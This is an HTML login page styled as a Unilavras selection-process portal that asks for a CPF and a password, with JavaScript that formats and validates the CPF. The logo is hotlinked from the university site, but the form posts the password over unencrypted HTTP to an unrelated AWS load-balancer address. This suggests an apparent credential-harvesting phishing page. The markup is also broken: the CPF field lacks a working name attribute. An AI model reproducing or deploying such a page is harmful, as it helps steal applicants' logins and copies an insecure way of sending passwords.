<!DOCTYPE html>
<html lang="pt-br">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/x-icon" href="https://portal.unilavras.edu.br/img/logoindex.png">
    <title>Processo Seletivo</title>
    <style>
        body {
            background-color: #f7f7f7;
        }

        .form-container {
            max-width: 400px;
            margin: auto;
            padding: 2em;
            border: 1px solid #ccc;
            border-radius: 1em;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 350px;
            background-color: white;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
        }

        .form-field {
            margin-bottom: 1.5em;
            text-align: left;

        }

        .form-field label {
            display: absolute;
            margin-bottom: 0.5em;
            font-family: 'Verdana';
            color: #3e3e3e;
            font-weight: bolder;

        }

        .form-field input {
            width: calc(100% - 22px);
            padding: 15px;
            border: 1px solid #ccc;
            border-radius: 8px;
            margin: 8px 0;

        }

        .form-field input[type="submit"] {
            width: 100%;
            background-color: #009DE0;
            color: white;
            border: none;
            cursor: pointer;
            font-family: 'Verdana';
            font-weight: bolder;
            font-size: medium;
        }

        .form-field input[type="submit"]:focus {
            background-color: #5ab6dd;
            transform: translateX(1rem) scale(1rem);
        }

        .error-message {
            color: red;
            display: none;
        }

        .img-container {
            text-align: center;
        }

        p {
            text-align: right;
            margin: 0;
        }
    </style>
</head>

<body>
    <div class="form-container">
        <form id="login-form"
            action="http://psfila-publi-nm7ue7bsswxk-338575592.us-east-1.elb.amazonaws.com/login/index.php"
            method="POST">
            <div class="img-container">
                <img src="https://portal.unilavras.edu.br/img/logoindex.png" width="120px" height="auto">
                <div class="form-field">
                    <label for="cpf">CPF:</label>
                    <input type="text" id="cpf" maxlength="14 name=" cpf" placeholder="000.000.000-00" required>
                    <span class="error-message" id="cpf-error">CPF inválido ou incompleto.</span>
                </div>
                <div class="form-field">
                    <label for="password">Senha:</label>
                    <input type="password" id="password" name="password" placeholder="********" required>
                </div>
                <div class="form-field">
                    <input type="submit" value="Acessar">
                </div>

                <div class="form-field">
                    <p style="color:#3e3e3e; font-size: larger">Dificuldades de acesso?
                    </p>
                    <p style="color:#009DE0;margin-block-start: 4px;"><b>Ligue ou envie WhatsApp para 0800 283 2833.</b>
                    </p>
                </div>
        </form>
    </div>

    <script>
        function formatCPF(cpf) {
            cpf = cpf.replace(/\D/g, ''); // Remove qualquer caractere não numérico
            cpf = cpf.replace(/(\d{3})(\d)/, '$1.$2');
            cpf = cpf.replace(/(\d{3})(\d)/, '$1.$2');
            cpf = cpf.replace(/(\d{3})(\d{1,2})$/, '$1-$2');
            return cpf;
        }

        function isValidCPF(cpf) {
            cpf = cpf.replace(/\D/g, ''); // Remove qualquer caractere não numérico
            if (cpf.length !== 11) return false;

            // Validação de CPF
            let sum = 0;
            let remainder;

            if (cpf === "00000000000" || cpf === "11111111111" || cpf === "22222222222" ||
                cpf === "33333333333" || cpf === "44444444444" || cpf === "55555555555" ||
                cpf === "66666666666" || cpf === "77777777777" || cpf === "88888888888" ||
                cpf === "99999999999") return false;

            for (let i = 1; i <= 9; i++) sum = sum + parseInt(cpf.substring(i - 1, i)) * (11 - i);
            remainder = (sum * 10) % 11;

            if ((remainder === 10) || (remainder === 11)) remainder = 0;
            if (remainder !== parseInt(cpf.substring(9, 10))) return false;

            sum = 0;
            for (let i = 1; i <= 10; i++) sum = sum + parseInt(cpf.substring(i - 1, i)) * (12 - i);
            remainder = (sum * 10) % 11;

            if ((remainder === 10) || (remainder === 11)) remainder = 0;
            if (remainder !== parseInt(cpf.substring(10, 11))) return false;

            return true;
        }

        document.getElementById('cpf').addEventListener('input', function (e) {
            e.target.value = formatCPF(e.target.value);
        });

        document.getElementById('login-form').addEventListener('submit', function (e) {
            const cpf = document.getElementById('cpf').value;
            const errorMessage = document.getElementById('cpf-error');

            if (!isValidCPF(cpf)) {
                e.preventDefault();
                errorMessage.style.display = 'block';
            } else {
                errorMessage.style.display = 'none';
            }
        });
    </script>
</body>

</html>